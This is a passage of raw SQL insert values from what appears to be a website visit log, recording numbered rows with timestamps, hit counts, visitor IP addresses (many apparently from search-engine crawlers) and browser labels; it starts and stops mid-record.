(391553,1551134660,1,1,0,0,'54.36.148.67','other'),(391554,1551134807,1,1,0,0,'46.229.168.139','other'),(391555,1551135341,1,1,0,0,'69.30.213.202','other'),(391556,1551135372,1,1,0,0,'54.36.149.9','other'),(391557,1551135540,1,1,0,0,'54.36.150.159','other'),(391558,1551136216,56,56,0,0,'192.151.145.178','other'),(391559,1551136221,1,1,0,0,'66.249.64.29','chrome'),(391560,1551136373,1,1,0,0,'54.36.150.101','other'),(391561,1551136374,2,2,0,0,'66.249.64.30','chrome'),(391562,1551136486,1,1,0,0,'8.29.198.27','other'),(391563,1551136586,1,1,0,0,'66.249.64.60','chrome'),(391564,1551137188,1,1,0,0,'46.229.168.133','other'),(391565,1551137214,2,2,0,0,'66.249.64.29','chrome'),(391566,1551137312,1,1,0,0,'54.36.150.59','other'),(391567,1551137750,1,1,0,0,'8.29.198.25','other'),(391568,1551137809,1,1,0,0,'66.249.64.30','chrome'),(391569,1551138105,1,1,0,0,'54.36.150.34','other'),(391570,1551138245,1,1,0,0,'195.128.17.206','other'),(391571,1551138365,1,1,0,0,'54.36.149.73','other'),(391572,1551138410,1,1,0,0,'54.36.149.51','other'),(391573,1551138715,1,1,0,0,'66.249.64.31','chrome'),(391574,1551138768,2,2,0,0,'216.244.66.241','other'),(391575,1551139290,1,1,0,0,'54.36.150.187','other'),(391576,1551139363,1,1,0,0,'54.36.149.101','other'),(391577,1551139453,1,1,0,0,'66.249.64.58','chrome'),(391578,1551139468,1,1,0,0,'66.249.64.29','chrome'),(391579,1551140052,1,1,0,0,'54.36.148.61','other'),(391580,1551140202,1,1,0,0,'157.55.39.105','other'),(391581,1551140304,1,1,0,0,'66.249.64.31','chrome'),(391582,1551140320,1,1,0,0,'54.36.148.225','other'),(391583,1551140567,1,1,0,0,'46.118.126.87','chrome'),(391584,1551140780,1,1,0,0,'209.17.97.82','other'),(391585,1551141158,2,2,0,0,'216.244.66.241','other'),(391586,1551141282,1,1,0,0,'54.36.149.12','other'),(391587,1551141403,1,1,0,0,'178.154.244.11','other'),(391588,1551141510,2,2,0,0,'66.249.64.58','chrome'),(391589,1551141531,1,1,0,0,'52.53.201.78','chrome'),(391590,1551141576,1,1,0,0,'54.36.148.30','other'),(391591,1551141622,1,1,0,0,'54.36.148.203','other'),(391592,1551141777,1,1,0,0,'66.249.64.30','chrome'),(391593,1551141819,1,1,0,0,'46.229.168.143','other'),(391594,1551141905,1,1,0,0,'207.46.13.48','other'),(391595,1551141968,1,1,0,0,'157.55.39.105','other'),(391596,1551142071,1,1,0,0,'54.36.148.141','other'),(391597,1551142103,2,2,0,0,'207.46.13.118','other'),(391598,1551142132,1,1,0,0,'54.36.150.106','other'),(391599,1551142200,2,2,0,0,'141.8.142.103','other'),(391600,1551142342,1,1,0,0,'54.36.148.182','other'),(391601,1551142651,2,2,0,0,'178.154.244.11','other'),(391602,1551142753,5,5,0,0,'5.45.207.79','other'),(391603,1551142783,1,1,0,0,'46.229.168.151','other'),(391604,1551142791,4,4,0,0,'5.45.207.19','other'),(391605,1551142817,2,2,0,0,'37.9.113.103','other'),(391606,1551143050,1,1,0,0,'54.36.149.38','other'),(391607,1551143132,1,1,0,0,'54.36.148.63','other'),(391608,1551143364,1,1,0,0,'87.250.224.47','other'),(391609,1551143403,1,1,0,0,'66.249.64.30','chrome'),(391610,1551143561,1,1,0,0,'54.36.150.74','other'),(391611,1551143590,1,1,0,0,'66.249.64.29','chrome'),(391612,1551143599,1,1,0,0,'54.36.150.10','other'),(391613,1551143848,2,2,0,0,'178.154.244.11','other'),(391614,1551143928,2,2,0,0,'87.250.224.65','other'),(391615,1551143965,1,1,0,0,'66.249.64.31','chrome'),(391616,1551144045,2,2,0,0,'95.108.213.4','other'),(391617,1551144206,2,2,0,0,'141.8.142.103','other'),(391618,1551144431,1,1,0,0,'207.46.13.111','other'),(391619,1551144469,1,1,0,0,'54.36.150.115','other'),(391620,1551144632,1,1,0,0,'54.36.148.0','other'),(391621,1551144739,3,3,0,0,'66.249.64.29','chrome'),(391622,1551144778,1,1,0,0,'178.154.244.11','other'),(391623,1551144780,1,1,0,0,'66.249.64.30','chrome'),(391624,1551145486,1,1,0,0,'40.77.167.104','other'),(391625,1551145507,1,1,0,0,'54.36.149.59','other'),(391626,1551145769,1,1,0,0,'54.36.148.1','other'),(391627,1551145896,3,3,0,0,'66.249.64.30','chrome'),(391628,1551145925,2,2,0,0,'66.249.64.29','chrome'),(391629,1551146448,1,1,0,0,'54.36.149.107','other'),(391630,1551146537,1,1,0,0,'5.45.207.19','other'),(391631,1551146641,1,1,0,0,'180.76.15.163','other'),(391632,1551146663,2,2,0,0,'54.36.148.18','other'),(391633,1551146665,1,1,0,0,'54.36.148.225','other'),(391634,1551146751,1,1,0,0,'54.36.149.20','other'),(391635,1551146756,1,1,0,0,'54.36.148.130','other'),(391636,1551146761,2,2,0,0,'66.249.64.58','chrome'),(391637,1551147263,1,1,0,0,'54.36.150.172','other'),(391638,1551147271,5,5,0,0,'66.249.64.30','chrome'),(391639,1551147332,1,1,0,0,'8.29.198.25','other'),(391640,1551147395,6,6,0,0,'66.249.64.29','chrome'),(391641,1551147516,1,1,0,0,'207.46.13.118','other'),(391642,1551147733,1,1,0,0,'180.76.15.147','other'),(391643,1551147812,1,1,0,0,'54.36.149.19','other'),(391644,1551148049,1,1,0,0,'54.36.148.76','other'),(391645,1551148308,1,1,0,0,'66.249.64.30','chrome'),(391646,1551148342,2,2,0,0,'66.249.64.31','chrome'),(391647,1551148368,2,2,0,0,'54.70.74.193','chrome'),(391648,1551148437,2,2,0,0,'66.249.64.62','chrome'),(391649,1551148449,1,1,0,0,'54.36.148.167','other'),(391650,1551148593,1,1,0,0,'8.29.198.26','other'),(391651,1551148822,1,1,0,0,'54.36.148.200','other'),(391652,1551149034,1,1,0,0,'66.249.64.29','chrome'),(391653,1551149105,1,1,0,0,'54.36.149.72','other'),(391654,1551149257,1,1,0,0,'207.46.13.118','other'),(391655,1551149435,1,1,0,0,'46.229.168.137','other'),(391656,1551149635,1,1,0,0,'216.244.66.241','other'),(391657,1551149645,1,1,0,0,'54.36.149.87','other'),(391658,1551150121,3,3,0,0,'66.249.64.29','chrome'),(391659,1551150197,2,2,0,0,'66.249.64.30','chrome'),(391660,1551150292,2,2,0,0,'66.249.64.31','chrome'),(391661,1551150906,1,1,0,0,'54.36.148.35','other'),(391662,1551151013,1,1,0,0,'46.229.168.150','other'),(391663,1551151024,1,1,0,0,'54.36.149.12','other'),(391664,1551151071,1,1,0,0,'66.249.64.29','chrome'),(391665,1551151259,1,1,0,0,'54.36.148.60','other'),(391666,1551151617,1,1,0,0,'207.46.13.233','other'),(391667,1551151762,2,2,0,0,'66.249.64.31','chrome'),(391668,1551151777,1,1,0,0,'66.249.64.30','chrome'),(391669,1551151938,1,1,0,0,'95.163.255.170','other'),(391670,1551152195,1,1,0,0,'54.36.150.169','other'),(391671,1551152212,1,1,0,0,'54.36.148.238','other'),(391672,1551152396,1,1,0,0,'54.36.150.189','other'),(391673,1551152454,1,1,0,0,'66.249.64.29','chrome'),(391674,1551152469,1,1,0,0,'54.36.150.159','other'),(391675,1551152694,1,1,0,0,'54.36.148.85','other'),(391676,1551152813,1,1,0,0,'54.36.150.102','other'),(391677,1551153023,1,1,0,0,'54.36.148.90','other'),(391678,1551153145,4,4,0,0,'66.249.64.30','chrome'),(391679,1551153332,1,1,0,0,'54.36.149.87','other'),(391680,1551153470,1,1,0,0,'66.249.64.29','chrome'),(391681,1551153664,1,1,0,0,'54.36.148.84','other'),(391682,1551153931,1,1,0,0,'54.36.150.153','other'),(391683,1551154181,1,1,0,0,'207.46.13.211','other'),(391684,1551154322,1,1,0,0,'54.36.150.182','other'),(391685,1551154526,3,3,0,0,'66.249.64.29','chrome'),(391686,1551154552,1,1,0,0,'157.55.39.170','other'),(391687,1551154633,1,1,0,0,'176.10.99.200','chrome'),(391688,1551154671,1,1,0,0,'66.249.64.58','chrome'),(391689,1551154814,1,1,0,0,'5.45.207.19','other'),(391690,1551154964,1,1,0,0,'157.55.39.55','other'),(391691,1551155016,1,1,0,0,'54.36.149.85','other'),(391692,1551155579,1,1,0,0,'54.36.150.179','other'),(391693,1551155596,1,1,0,0,'54.36.149.69','other'),(391694,1551155909,2,2,0,0,'66.249.64.29','chrome'),(391695,1551156237,1,1,0,0,'66.249.64.60','chrome'),(391696,1551156414,1,1,0,0,'157.55.39.66','other'),(391697,1551156944,1,1,0,0,'46.229.168.151','other'),(391698,1551157319,1,1,0,0,'66.249.64.29','chrome'),(391699,1551157389,1,1,0,0,'54.36.148.253','other'),(391700,1551157946,2,2,0,0,'66.249.64.62','chrome'),(391701,1551157951,1,1,0,0,'216.244.66.241','other'),(391702,1551158101,1,1,0,0,'157.55.39.235','other'),(391703,1551158177,1,1,0,0,'8.29.198.27','other'),(391704,1551158250,1,1,0,0,'54.36.150.126','other'),(391705,1551158581,2,2,0,0,'66.249.64.30','chrome'),(391706,1551158749,1,1,0,0,'54.36.148.76','other'),(391707,1551159021,1,1,0,0,'54.36.150.180','other'),(391708,1551159048,1,1,0,0,'54.36.150.78','other'),(391709,1551159175,1,1,0,0,'51.68.143.229','chrome'),(391710,1551159363,1,1,0,0,'66.249.64.31','chrome'),(391711,1551159366,1,1,0,0,'54.36.149.20','other'),(391712,1551159391,2,2,0,0,'66.249.64.29','chrome'),(391713,1551159436,1,1,0,0,'8.29.198.27','other'),(391714,1551159706,1,1,0,0,'40.77.167.198','other'),(391715,1551159835,1,1,0,0,'46.229.168.137','other'),(391716,1551160085,2,2,0,0,'66.249.64.30','chrome'),(391717,1551160182,2,2,0,0,'5.45.207.79','other'),(391718,1551160201,1,1,0,0,'54.36.148.139','other'),(391719,1551160579,1,1,0,0,'54.36.148.225','other'),(391720,1551161066,1,1,0,0,'54.36.148.119','other'),(391721,1551161126,1,1,0,0,'54.36.148.61','other'),(391722,1551161433,1,1,0,0,'66.249.64.62','chrome'),(391723,1551161436,3,3,0,0,'66.249.64.30','chrome'),(391724,1551161618,1,1,0,0,'40.77.167.123','other'),(391725,1551161701,1,1,0,0,'109.70.100.21','other'),(391726,1551161876,1,1,0,0,'54.36.148.186','other'),(391727,1551161934,1,1,0,0,'54.36.150.36','other'),(391728,1551162366,1,1,0,0,'46.229.168.141','other'),(391729,1551162550,1,1,0,0,'54.36.149.36','other'),(391730,1551163061,1,1,0,0,'54.36.148.179','other'),(391731,1551163065,1,1,0,0,'54.36.148.91','other'),(391732,1551163559,1,1,0,0,'54.36.150.60','other'),(391733,1551163602,1,1,0,0,'91.196.178.67','chrome'),(391734,1551163729,1,1,0,0,'66.249.64.31','chrome'),(391735,1551163813,1,1,0,0,'54.36.150.64','other'),(391736,1551164119,1,1,0,0,'54.36.150.169','other'),(391737,1551164323,1,1,0,0,'66.249.64.30','chrome'),(391738,1551164370,1,1,0,0,'54.36.150.122','other'),(391739,1551164490,1,1,0,0,'54.36.149.46','other'),(391740,1551164532,1,1,0,0,'40.77.167.166','other'),(391741,1551164823,1,1,0,0,'91.196.178.94','chrome'),(391742,1551165054,1,1,0,0,'54.36.150.180','other'),(391743,1551165092,1,1,0,0,'54.36.150.46','other'),(391744,1551165205,1,1,0,0,'54.36.148.227','other'),(391745,1551165276,1,1,0,0,'54.36.148.57','other'),(391746,1551165303,1,1,0,0,'54.36.148.194','other'),(391747,1551165346,1,1,0,0,'51.255.65.46','other'),(391748,1551165564,1,1,0,0,'54.36.148.108','other'),(391749,1551165576,1,1,0,0,'95.132.48.70','chrome'),(391750,1551165578,1,1,0,0,'54.36.148.162','other'),(391751,1551165642,1,1,0,0,'216.244.66.241','other'),(391752,1551165683,1,1,0,0,'46.96.5.186','chrome'),(391753,1551165706,1,1,0,0,'66.249.64.60','chrome'),(391754,1551165889,1,1,0,0,'91.196.178.76','chrome'),(391755,1551166404,1,1,0,0,'66.249.64.62','chrome'),(391756,1551166519,1,1,0,0,'54.36.149.100','other'),(391757,1551166647,1,1,0,0,'54.36.148.73','other'),(391758,1551166765,1,1,0,0,'5.188.210.65','chrome'),(391759,1551166989,1,1,0,0,'54.36.150.159','other'),(391760,1551167021,1,1,0,0,'91.196.178.94','chrome'),(391761,1551167174,1,1,0,0,'92.112.35.215','chrome'),(391762,1551167452,1,1,0,0,'92.113.35.44','chrome'),(391763,1551167688,1,1,0,0,'91.196.177.228','chrome'),(391764,1551167803,1,1,0,0,'46.229.168.145','other'),(391765,1551168055,1,1,0,0,'66.249.64.60','chrome'),(391766,1551168308,1,1,0,0,'66.249.64.29','chrome'),(391767,1551168325,1,1,0,0,'66.249.64.58','chrome'),(391768,1551168396,1,1,0,0,'46.229.168.149','other'),(391769,1551168771,1,1,0,0,'40.77.167.28','other'),(391770,1551168790,1,1,0,0,'54.36.149.40','other'),(391771,1551168896,1,1,0,0,'54.36.148.8','other'),(391772,1551169007,1,1,0,0,'8.29.198.27','other'),(391773,1551169018,1,1,0,0,'91.196.178.169','chrome'),(391774,1551169074,1,1,0,0,'91.201.244.133','chrome'),(391775,1551169341,1,1,0,0,'54.36.150.172','other'),(391776,1551169388,1,1,0,0,'109.70.100.22','chrome'),(391777,1551169503,2,2,0,0,'207.46.13.85','other'),(391778,1551169595,1,1,0,0,'198.167.223.38','chrome'),(391779,1551169871,4,4,0,0,'66.249.64.30','chrome'),(391780,1551169905,1,1,0,0,'37.53.158.40','chrome'),(391781,1551170276,1,1,0,0,'8.29.198.26','other'),(391782,1551170415,1,1,0,0,'54.36.149.63','other'),(391783,1551170440,3,3,0,0,'216.244.66.241','other'),(391784,1551170641,1,1,0,0,'171.25.193.77','chrome'),(391785,1551170671,1,1,0,0,'54.36.148.82','other'),(391786,1551170747,1,1,0,0,'46.229.168.148','other'),(391787,1551170755,1,1,0,0,'54.36.150.143','other'),(391788,1551170994,1,1,0,0,'66.249.64.29','chrome'),(391789,1551171035,1,1,0,0,'54.36.148.191','other'),(391790,1551171066,2,2,0,0,'66.249.64.31','chrome'),(391791,1551171196,1,1,0,0,'54.36.148.125','other'),(391792,1551171203,2,2,0,0,'66.249.64.30','chrome'),(391793,1551171269,1,1,0,0,'54.36.149.45','other'),(391794,1551171507,1,1,0,0,'54.36.148.124','other'),(391795,1551171549,1,1,0,0,'40.77.167.123','other'),(391796,1551171802,1,1,0,0,'46.229.168.142','other'),(391797,1551171886,1,1,0,0,'66.249.64.62','chrome'),(391798,1551171980,2,2,0,0,'66.249.64.60','chrome'),(391799,1551172020,1,1,0,0,'91.196.178.168','chrome'),(391800,1551172398,1,1,0,0,'66.249.64.30','chrome'),(391801,1551172403,1,1,0,0,'66.249.64.29','chrome'),(391802,1551172442,1,1,0,0,'54.36.148.11','other'),(391803,1551172593,1,1,0,0,'134.73.199.154','chrome'),(391804,1551172965,1,1,0,0,'95.134.204.209','chrome'),(391805,1551173074,1,1,0,0,'54.36.148.70','other'),(391806,1551173173,1,1,0,0,'54.36.148.37','other'),(391807,1551173319,1,1,0,0,'95.134.101.181','chrome'),(391808,1551173389,2,2,0,0,'66.249.64.30','chrome'),(391809,1551173600,1,1,0,0,'91.196.178.168','chrome'),(391810,1551173924,1,1,0,0,'54.36.149.103','other'),(391811,1551174228,1,1,0,0,'54.36.150.100','other'),(391812,1551174945,1,1,0,0,'185.93.184.94','chrome'),(391813,1551175094,1,1,0,0,'54.36.150.118','other'),(391814,1551175108,1,1,0,0,'54.36.148.61','other'),(391815,1551175183,1,1,0,0,'66.249.64.30','chrome'),(391816,1551175306,1,1,0,0,'54.36.150.37','other'),(391817,1551175437,1,1,0,0,'54.36.148.153','other'),(391818,1551175762,1,1,0,0,'157.55.39.62','other'),(391819,1551175844,1,1,0,0,'194.44.179.251','chrome'),(391820,1551175894,1,1,0,0,'178.133.95.201','chrome'),(391821,1551176846,1,1,0,0,'66.249.64.31','chrome'),(391822,1551176861,1,1,0,0,'54.36.148.50','other'),(391823,1551177187,1,1,0,0,'66.249.64.62','chrome'),(391824,1551177469,1,1,0,0,'192.162.35.177','chrome'),(391825,1551177687,1,1,0,0,'46.229.168.149','other'),(391826,1551177749,1,1,0,0,'91.196.178.161','chrome'),(391827,1551177896,1,1,0,0,'40.77.167.74','other'),(391828,1551177921,1,1,0,0,'54.36.150.48','other'),(391829,1551178255,1,1,0,0,'54.36.148.246','other'),(391830,1551178678,1,1,0,0,'195.176.3.20','chrome'),(391831,1551178758,4,4,0,0,'66.249.64.29','chrome'),(391832,1551178780,9,9,0,0,'66.249.64.30','chrome'),(391833,1551178805,5,5,0,0,'66.249.64.31','chrome'),(391834,1551178880,1,1,0,0,'54.36.150.124','other'),(391835,1551179303,1,1,0,0,'46.229.168.147','other'),(391836,1551179314,1,1,0,0,'54.36.150.178','other'),(391837,1551179366,1,1,0,0,'54.36.148.50','other'),(391838,1551179494,2,2,0,0,'91.209.11.236','other'),(391839,1551179522,1,1,0,0,'46.229.168.135','other'),(391840,1551179670,1,1,0,0,'46.229.168.151','other'),(391841,1551179831,1,1,0,0,'8.29.198.26','other'),(391842,1551179836,2,2,0,0,'66.249.64.30','chrome'),(391843,1551179864,3,3,0,0,'66.249.64.29','chrome'),(391844,1551179880,1,1,0,0,'66.249.64.31','chrome'),(391845,1551180028,1,1,0,0,'54.36.148.169','other'),(391846,1551180080,1,1,0,0,'77.111.244.30','chrome'),(391847,1551180390,4,4,0,0,'178.154.244.11','other'),(391848,1551180394,1,1,0,0,'5.45.207.19','other'),(391849,1551180589,1,1,0,0,'54.36.148.235','other'),(391850,1551180902,1,1,0,0,'91.209.11.236','other'),(391851,1551181040,1,1,0,0,'54.36.148.171','other'),(391852,1551181115,1,1,0,0,'8.29.198.27','other'),(391853,1551181235,1,1,0,0,'95.108.213.4','other'),(391854,1551181366,3,3,0,0,'5.45.207.79','other'),(391855,1551181463,1,1,0,0,'54.36.150.35','other'),(391856,1551181472,1,1,0,0,'54.36.148.136','other'),(391857,1551181473,1,1,0,0,'54.36.150.110','other'),(391858,1551181526,1,1,0,0,'54.36.148.229','other'),(391859,1551181697,1,1,0,0,'40.77.167.74','other'),(391860,1551181919,3,3,0,0,'141.8.142.103','other'),(391861,1551181981,1,1,0,0,'54.36.148.70','other'),(391862,1551182036,3,3,0,0,'178.154.244.11','other'),(391863,1551182084,1,1,0,0,'91.209.11.236','other'),(391864,1551182628,1,1,0,0,'78.111.187.209','chrome'),(391865,1551182637,1,1,0,0,'54.36.149.91','other'),(391866,1551182655,2,2,0,0,'5.45.207.19','other'),(391867,1551182816,1,1,0,0,'46.229.168.149','other'),(391868,1551182819,2,2,0,0,'5.45.207.79','other'),(391869,1551182835,1,1,0,0,'87.250.224.65','other'),(391870,1551182856,1,1,0,0,'54.36.150.42','other'),(391871,1551182907,1,1,0,0,'141.8.142.103','other'),(391872,1551182930,1,1,0,0,'37.55.90.87','chrome'),(391873,1551183061,1,1,0,0,'77.111.246.135','chrome'),(391874,1551183121,1,1,0,0,'66.249.64.30','chrome'),(391875,1551183175,3,3,0,0,'178.154.244.11','other'),(391876,1551183250,1,1,0,0,'54.36.148.166','other'),(391877,1551183329,1,1,0,0,'91.209.11.236','other'),(391878,1551183589,3,3,0,0,'5.45.207.19','other'),(391879,1551183856,1,1,0,0,'54.36.149.19','other'),(391880,1551183869,1,1,0,0,'66.249.64.29','chrome'),(391881,1551183873,1,1,0,0,'95.108.213.4','other'),(391882,1551183991,1,1,0,0,'141.8.142.103','other'),(391883,1551184164,1,1,0,0,'91.196.178.76','chrome'),(391884,1551184177,2,2,0,0,'37.9.113.103','other'),(391885,1551184454,1,1,0,0,'37.9.113.148','other'),(391886,1551184475,1,1,0,0,'216.244.66.241','other'),(391887,1551184610,1,1,0,0,'54.36.149.41','other'),(391888,1551184677,1,1,0,0,'91.209.11.236','other'),(391889,1551184678,1,1,0,0,'5.45.207.19','other'),(391890,1551184746,1,1,0,0,'91.196.178.134','firefox'),(391891,1551184828,1,1,0,0,'207.46.13.70','other'),(391892,1551184833,1,1,0,0,'95.108.213.4','other'),(391893,1551185048,1,1,0,0,'157.55.39.76','other'),(391894,1551185355,1,1,0,0,'54.36.148.198','other'),(391895,1551185611,1,1,0,0,'141.8.183.22','other'),(391896,1551185689,1,1,0,0,'178.154.171.24','other'),(391897,1551185743,1,1,0,0,'54.36.148.41','other'),(391898,1551185891,1,1,0,0,'46.229.168.132','other'),(391899,1551186035,1,1,0,0,'176.122.115.165','chrome'),(391900,1551186112,2,2,0,0,'91.196.178.161','chrome'),(391901,1551186304,1,1,0,0,'91.124.181.19','chrome'),(391902,1551186536,1,1,0,0,'46.229.168.148','other'),(391903,1551186550,1,1,0,0,'54.36.149.92','other'),(391904,1551186661,1,1,0,0,'62.80.166.58','chrome'),(391905,1551186771,1,1,0,0,'197.231.221.211','chrome'),(391906,1551186803,1,1,0,0,'216.244.66.241','other'),(391907,1551187030,1,1,0,0,'54.36.149.65','other'),(391908,1551187172,1,1,0,0,'157.55.39.62','other'),(391909,1551187206,1,1,0,0,'66.249.64.60','chrome'),(391910,1551187258,1,1,0,0,'91.196.178.94','chrome'),(391911,1551187519,1,1,0,0,'66.249.64.31','chrome'),(391912,1551187780,1,1,0,0,'66.249.64.62','chrome'),(391913,1551187785,1,1,0,0,'46.98.139.33','firefox'),(391914,1551187813,1,1,0,0,'40.77.167.21','other'),(391915,1551187834,2,2,0,0,'82.207.121.233','chrome'),(391916,1551187950,1,1,0,0,'54.36.150.181','other'),(391917,1551188087,1,1,0,0,'5.3.150.101','msie'),(391918,1551188108,1,1,0,0,'37.53.53.164','chrome'),(391919,1551188404,1,1,0,0,'54.36.148.183','other'),(391920,1551188728,1,1,0,0,'207.46.13.70','other'),(391921,1551188734,1,1,0,0,'54.36.149.66','other'),(391922,1551189083,1,1,0,0,'5.45.207.19','other'),(391923,1551189084,1,1,0,0,'216.244.66.241','other'),(391924,1551189277,1,1,0,0,'91.196.178.94','chrome'),(391925,1551190201,1,1,0,0,'91.196.178.94','chrome'),(391926,1551190371,1,1,0,0,'91.196.178.74','chrome'),(391927,1551190394,1,1,0,0,'91.196.178.65','chrome'),(391928,1551190671,1,1,0,0,'8.29.198.26','other'),(391929,1551190917,1,1,0,0,'54.36.149.16','other'),(391930,1551190981,1,1,0,0,'207.46.13.118','other'),(391931,1551191240,1,1,0,0,'37.52.175.240','chrome'),(391932,1551191247,1,1,0,0,'95.163.255.112','other'),(391933,1551191281,1,1,0,0,'54.36.150.8','other'),(391934,1551191500,1,1,0,0,'95.163.255.118','other'),(391935,1551191519,1,1,0,0,'54.36.150.159','other'),(391936,1551191640,1,1,0,0,'54.36.149.26','other'),(391937,1551191962,1,1,0,0,'8.29.198.25','other'),(391938,1551192138,1,1,0,0,'216.244.66.241','other'),(391939,1551192306,1,1,0,0,'5.45.207.19','other'),(391940,1551192323,1,1,0,0,'91.196.178.169','chrome'),(391941,1551192383,1,1,0,0,'46.229.168.140','other'),(391942,1551192488,1,1,0,0,'95.134.221.81','chrome'),(391943,1551193001,1,1,0,0,'40.77.167.158','other'),(391944,1551193358,1,1,0,0,'91.196.178.65','chrome'),(391945,1551193379,1,1,0,0,'54.36.148.163','other'),(391946,1551193702,1,1,0,0,'54.36.149.9','other'),(391947,1551193717,1,1,0,0,'157.55.39.159','other'),(391948,1551193726,1,1,0,0,'95.135.240.48','chrome'),(391949,1551193857,1,1,0,0,'54.36.148.135','other'),(391950,1551193942,1,1,0,0,'157.55.39.76','other'),(391951,1551193944,1,1,0,0,'54.36.150.114','other'),(391952,1551194114,1,1,0,0,'54.36.150.141','other'),(391953,1551194226,1,1,0,0,'66.249.64.62','chrome'),(391954,1551194446,1,1,0,0,'66.249.64.29','chrome'),(391955,1551194585,1,1,0,0,'91.196.178.77','chrome'),(391956,1551194671,1,1,0,0,'66.249.64.30','chrome'),(391957,1551194695,1,1,0,0,'54.36.148.179','other'),(391958,1551194768,1,1,0,0,'46.229.168.132','other'),(391959,1551195034,1,1,0,0,'207.46.13.118','other'),(391960,1551195356,1,1,0,0,'91.196.178.91','firefox'),(391961,1551195728,2,2,0,0,'66.249.64.31','chrome'),(391962,1551195750,2,2,0,0,'66.249.64.29','chrome'),(391963,1551196263,1,1,0,0,'207.46.13.118','other'),(391964,1551196323,1,1,0,0,'91.196.178.78','firefox'),(391965,1551196750,1,1,0,0,'54.36.148.169','other'),(391966,1551196884,2,2,0,0,'66.249.64.29','chrome'),(391967,1551197118,1,1,0,0,'46.229.168.138','other'),(391968,1551197399,2,2,0,0,'95.134.202.81','chrome'),(391969,1551197449,1,1,0,0,'54.36.148.216','other'),(391970,1551197592,1,1,0,0,'54.36.149.22','other'),(391971,1551197695,1,1,0,0,'46.188.125.255','chrome'),(391972,1551197828,1,1,0,0,'216.244.66.241','other'),(391973,1551197948,1,1,0,0,'207.46.13.118','other'),(391974,1551197994,1,1,0,0,'91.196.178.45','chrome'),(391975,1551198233,2,2,0,0,'66.249.64.30','chrome'),(391976,1551199805,1,1,0,0,'216.244.66.241','other'),(391977,1551199835,1,1,0,0,'46.229.168.129','other'),(391978,1551199940,1,1,0,0,'54.36.148.8','other'),(391979,1551200322,1,1,0,0,'178.154.244.11','other'),(391980,1551200351,1,1,0,0,'213.180.203.53','other'),(391981,1551200391,2,2,0,0,'5.255.253.38','other'),(391982,1551200395,1,1,0,0,'141.8.142.65','other'),(391983,1551200421,1,1,0,0,'87.250.224.47','other'),(391984,1551200446,1,1,0,0,'66.249.64.31','chrome'),(391985,1551200601,2,2,0,0,'87.250.224.107','other'),(391986,1551200712,1,1,0,0,'54.36.149.79','other'),(391987,1551200733,1,1,0,0,'37.9.113.148','other'),(391988,1551200768,2,2,0,0,'95.108.181.75','other'),(391989,1551200906,1,1,0,0,'66.249.64.58','chrome'),(391990,1551201062,1,1,0,0,'46.229.168.135','other'),(391991,1551201160,1,1,0,0,'54.36.148.160','other'),(391992,1551201168,1,1,0,0,'141.8.142.103','other'),(391993,1551201196,1,1,0,0,'54.36.149.74','other'),(391994,1551201238,1,1,0,0,'46.229.168.133','other'),(391995,1551201410,1,1,0,0,'180.76.15.141','other'),(391996,1551201445,1,1,0,0,'207.46.13.137','other'),(391997,1551201494,1,1,0,0,'87.250.224.47','other'),(391998,1551201527,1,1,0,0,'8.29.198.27','other'),(391999,1551201546,1,1,0,0,'5.45.207.79','other'),(392000,1551201696,2,2,0,0,'87.250.224.107','other'),(392001,1551201709,1,1,0,0,'178.154.244.11','other'),(392002,1551201810,2,2,0,0,'95.108.213.4','other'),(392003,1551201936,1,1,0,0,'213.180.203.9','other'),(392004,1551201961,1,1,0,0,'95.108.213.50','other'),(392005,1551201966,1,1,0,0,'46.229.168.129','other'),(392006,1551202475,1,1,0,0,'87.250.224.47','other'),(392007,1551202575,1,1,0,0,'54.36.150.17','other'),(392008,1551202606,1,1,0,0,'54.36.148.93','other'),(392009,1551202746,1,1,0,0,'141.8.142.108','other'),(392010,1551202758,1,1,0,0,'178.154.171.27','other'),(392011,1551202798,1,1,0,0,'8.29.198.27','other'),(392012,1551202852,1,1,0,0,'54.36.150.91','other'),(392013,1551202944,1,1,0,0,'213.180.203.9','other'),(392014,1551203100,1,1,0,0,'207.46.13.137','other'),(392015,1551203669,1,1,0,0,'207.46.13.81','other'),(392016,1551203754,1,1,0,0,'37.9.113.148','other'),(392017,1551203854,2,2,0,0,'87.250.224.65','other'),(392018,1551203859,2,2,0,0,'37.9.113.20','other'),(392019,1551203904,1,1,0,0,'207.46.13.118','other'),(392020,1551203986,1,1,0,0,'91.196.178.87','chrome'),(392021,1551204320,1,1,0,0,'54.36.148.109','other'),(392022,1551204332,1,1,0,0,'178.154.171.24','other'),(392023,1551204539,1,1,0,0,'66.249.64.30','chrome'),(392024,1551204571,1,1,0,0,'95.108.181.75','other'),(392025,1551204666,1,1,0,0,'5.45.207.8','other'),(392026,1551204904,1,1,0,0,'54.36.150.77','other'),(392027,1551205079,3,3,0,0,'178.154.244.11','other'),(392028,1551205110,1,1,0,0,'95.108.213.4','other'),(392029,1551205113,1,1,0,0,'213.180.203.48','other'),(392030,1551205486,1,1,0,0,'54.36.149.25','other'),(392031,1551205516,1,1,0,0,'216.244.66.241','other'),(392032,1551205517,2,2,0,0,'5.45.207.79','other'),(392033,1551205623,1,1,0,0,'46.229.168.151','other'),(392034,1551205719,1,1,0,0,'54.36.148.2','other'),(392035,1551205743,1,1,0,0,'46.229.168.135','other'),(392036,1551206244,1,1,0,0,'207.46.13.137','other'),(392037,1551206262,1,1,0,0,'66.249.64.29','chrome'),(392038,1551206271,1,1,0,0,'46.211.124.141','chrome'),(392039,1551206817,1,1,0,0,'54.36.148.12','other'),(392040,1551207171,1,1,0,0,'178.154.244.11','other'),(392041,1551207327,1,1,0,0,'54.36.148.4','other'),(392042,1551207401,1,1,0,0,'66.249.64.60','chrome'),(392043,1551207664,1,1,0,0,'54.36.150.151','other'),(392044,1551207714,1,1,0,0,'40.77.167.86','other'),(392045,1551207797,1,1,0,0,'54.36.148.35','other'),(392046,1551207927,1,1,0,0,'37.52.20.165','chrome'),(392047,1551208376,1,1,0,0,'54.36.148.123','other'),(392048,1551208605,1,1,0,0,'54.36.149.95','other'),(392049,1551209076,1,1,0,0,'178.133.108.8','chrome'),(392050,1551209097,1,1,0,0,'141.8.142.103','other'),(392051,1551209172,1,1,0,0,'54.36.150.107','other'),(392052,1551209334,1,1,0,0,'54.36.148.43','other'),(392053,1551209981,1,1,0,0,'54.36.148.9','other'),(392054,1551210007,1,1,0,0,'54.36.148.198','other'),(392055,1551210039,1,1,0,0,'54.36.148.164','other'),(392056,1551210401,1,1,0,0,'207.46.13.114','other'),(392057,1551210573,1,1,0,0,'66.249.64.30','chrome'),(392058,1551210715,1,1,0,0,'54.36.148.74','other'),(392059,1551210717,2,2,0,